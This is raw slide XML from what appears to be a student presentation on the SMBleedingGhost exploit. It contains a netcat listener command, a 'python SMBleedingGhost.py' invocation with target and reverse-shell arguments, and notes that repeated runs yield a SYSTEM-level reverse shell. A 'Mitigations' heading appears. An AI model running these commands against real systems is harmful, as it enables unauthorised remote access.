        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289304" y="4612943"/>
            <a:ext cx="7745969" cy="1408222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Setting up Netcat to listen incoming TCP connections on any port in attacker system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COMMAND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> : “nc –lvp &lt;any_port_number&gt;”</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="2000">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="607832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6361B-3057-411B-9497-2EA0B338C61A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767290" y="1780661"/>
            <a:ext cx="3582073" cy="1463472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STEP 07 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Executing the exploit</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="3000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 2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C716152B-3FB2-463B-802C-40EB3FE7349D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767290" y="3383121"/>
            <a:ext cx="3582072" cy="2793251"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Executing the “SMBleedingGhost.py” exploit in Linux environment will return an error as it is designed to work in a windows system only.</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FECE8C02-2529-4343-9E39-63891892E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652" y="1103990"/>
            <a:ext cx="6642532" cy="4071786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189088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0BC583-F468-4552-9F6C-7D2E97BA54D8}"/>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000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Executing the exploit in a windows system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ABB6913-9585-4993-891E-3A53714BB436}"/>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1700" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>COMMAND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>python SMBleedingGhost.py &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200" err="1">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>target_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200" err="1">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>reverse_shell_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200" err="1">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>listening_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FC5825"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&gt;”</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EAD7C079-3EDF-4BC6-8706-906B2519F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83" y="2427541"/>
            <a:ext cx="9750334" cy="3997637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157767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om of colourful chairs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6ACCED-8314-49E5-B5A7-4C3EFA6CEBB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="35000"/>
          </a:blip>
          <a:srcRect t="184" b="15547"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="-98473"/>
            <a:ext cx="12191980" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E28C4719-9C17-4E49-B110-91492B06349E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1065862"/>
            <a:ext cx="4151365" cy="4726276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:ln w="6600">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="accent2"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PRESENTED BY</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="4000" b="1">
              <a:ln w="6600">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="accent2"/>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E957BFE-FA3F-4AD6-92DE-DF8F78B3C518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5155379" y="1065862"/>
            <a:ext cx="5744685" cy="4726276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="38100" h="38100" prst="angle"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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rPr>
              <a:t>BHMP NAVODYA_IT20636838</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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rPr>
              <a:t>GNS SENARATHNE_IT20647346</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="2400" b="1">
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418539463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38A4645-C641-4F52-8DFC-12B3C128FFE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888631" y="4760132"/>
            <a:ext cx="3947420" cy="1777829"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="10300">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="10300">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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1E878843-6915-4EFE-87E6-552E61B55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73468"/>
            <a:ext cx="10914060" cy="3356074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F37747-75A8-46BE-9119-3F60E7168867}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5118447" y="4767660"/>
            <a:ext cx="6281873" cy="1770300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>After the execution of the exploit the victim system may encounter a crash but running the exploit multiple times will open a shell from victim on attacker machine without crashing the victim.</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327559809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47429287-1972-4FC9-B98A-9B9729DC3954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="10689" r="-1" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-281354"/>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A1E4A6E-ED63-4593-8455-78AC6E95F6BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2917203" y="4592998"/>
            <a:ext cx="7478821" cy="1693186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Running the exploit multiple times will eventually won’t crash the victim machine</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222528460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B7FA39C1-FA8D-42F0-8C96-CF52E38EB780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="10866" r="-1" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="600623" y="28773"/>
            <a:ext cx="11588329" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43"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062AAE-2CA2-40D8-A1E6-3A7E98D53CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742909" y="1201555"/>
            <a:ext cx="3874685" cy="3186359"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then Netcat will listen to the port connecting it to the Target system with the privilege of authority/system.</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2233237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5" name="Freeform: Shape 1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065FAC4-9496-4994-9EE9-08ED79A7E6D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765051" y="2286000"/>
            <a:ext cx="3384000" cy="3844800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You can confirm the victim machine by checking the IP address of the victim in reverse shell.</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34"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5DE90F5F-22C5-415B-B73D-3C994E1F2E72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="421" b="3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5411053" y="756552"/>
            <a:ext cx="6014185" cy="5344895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90107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és d’une maison">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC88EC1E-4E67-4830-A4D2-5FD5EB4CDA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="45000"/>
          </a:blip>
          <a:srcRect t="10413" b="5318"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="1"/>
            <a:ext cx="12191980" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 1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26C8516A-2242-4A06-BB40-38F58C160AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769531" y="2000404"/>
            <a:ext cx="8652938" cy="2857191"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="38100" h="38100" prst="angle"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:effectLst>
                  <a:glow rad="63500">
                    <a:schemeClr val="accent1">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="50800" dist="38100" algn="l" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MITIGATIONS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 1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955957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és d’une maison">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC88EC1E-4E67-4830-A4D2-5FD5EB4CDA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="45000"/>
          </a:blip>
          <a:srcRect t="10413" b="5318"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="1"/>
            <a:ext cx="12191980" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 1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26C8516A-2242-4A06-BB40-38F58C160AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719984" y="577045"/>
            <a:ext cx="3994674" cy="686210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="90000"/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="38100" h="38100" prst="angle"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
